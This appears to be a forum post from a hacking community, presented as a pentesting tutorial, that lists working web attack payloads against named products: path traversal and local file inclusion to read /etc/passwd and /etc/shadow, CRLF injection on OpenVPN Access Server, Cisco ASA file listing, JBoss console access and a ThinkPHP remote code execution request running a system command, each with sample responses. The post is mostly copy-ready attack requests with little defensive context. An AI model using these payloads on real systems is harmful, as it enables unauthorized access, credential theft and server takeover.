Welcome!

Welcome to the 1337pwn community forums. Register now for an account.

Registration is free!

Register Now

Announcement

Collapse
No announcement yet.

Discovering Hidden Directories & Sensitive Files

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    Discovering Hidden Directories & Sensitive Files

    It is possible to check for vulnerabilities within secure applications. Attackers may discover hidden directories and sensitive files that they may leverage.

    Local File Inclusion

    An application with the URL /gui/file_viewer.php can be vulnerable to Local File Inclusion (LFI). More importantly, an attacker could append file paths to the uloaded_filename parameter which could process the specific file by including its content in a temporary directory inside the app's web root.

    Code:
    /gui/file_viewer.php?encrypt=N&target_folder=utilities& uploaded_filename=../../../../../../../etc/passwd
    By visiting the URL located in the URL parameter of the location header, you'll see that the contents of the /etc/passwd file are displayed:

    Click image for larger version  Name:	pentesting-tutorial.jpg Views:	0 Size:	30.6 KB ID:	353

    CRLF Injection

    Another example is where an attacker could attempt to inject a CRLF character such as %0A with the following url:
    Code:
    https://<host>/__session_start__/
    Code:
    GET /__session_start__/%0atest HTTP/1.1
    Host: https://<host>
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Connection: close
    Cookie: openvpn_sess_******=**********
    Pragma: no-cache
    Cache-Control: no-cache
    Code:
    /_session_start_/%0atest
    The response would be:
    Code:
    HTTP/1.1 302 Found
    Date: Sat, 25 April 2020 08:25:38 GMT
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Location: https://<host>
    test
    Server: OpenVPN-AS
    
    <html>
           <body>
           <p>REDIRECT</p>
           </body>
    </html>
    We can see that the %0A character is considered and the string itself lands at an unforeseen position.

    file_list.json

    An attacker could also alter the path to /+CSCOU+/../+CSCOE+/files/file_list.json to list particular files from the web interface.

    Particularly:
    Code:
    /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/
    What's interesting is that you may locate the user ID connected with it. Such vulnerability could permit an attacker to browse files and divulge sensitive information.

    Remote Code Execution

    An attacker could get themselves redirected to a JBoss web console page which meant going to the JBoss instance that was running on localhost using:
    Code:
    https://<host>/josso/%5C../web-console
    An attacker can transmit every request to /josso/%5C../web-console which means that they may accomplish anything they desired on the server such as looking at a backup SQL dump or altering the homepage.

    Directory Traversal & Local File Inclusion

    An attacker could gain unauthorized access to a targeted server's local file system through the /server/logs/download URL on the logName parameter.

    This permits for sensitive local files like /etc/passwd or /etc/shadow to be derived by the attackers by way of a zip file.

    Example:
    Code:
    https://<host>/server/logs/download?logType=error&logName=../../../../../../../../etc/shadow&logSource=engine
    The response would be:
    Code:
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream Content-Disposition: attachment; filename=”shadow.zip”
    Connection: Close
    As you can see, the contents of /etc/shadow are contained in the downloaded shadow.zip file.

    /etc/passwd in /assets/

    The contents of /etc/passwd are potentially readable in the /assets/ directory:
    Code:
    /assets/file:%2f%2f/etc/passwd
    Remote Code Execution (RCE)

    Remote Code Execution can be performed via an HTTP request:
    Code:
    /public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
    Example:
    Code:
    http://<host>:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
    The response would appear to be something like the following:
    Code:
    HTTP/1.1 200 OK
    Date: Sat, 25 Apr 2020 0:5:12 GMT
    Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
    X-Powered-By: PHP/5.4.45
    Content-Length: 60
    Connection: close
    Content-Type: text/html; charset=utf-8
    
    win-**********\administrator
    win-**********\administrator
Working...
X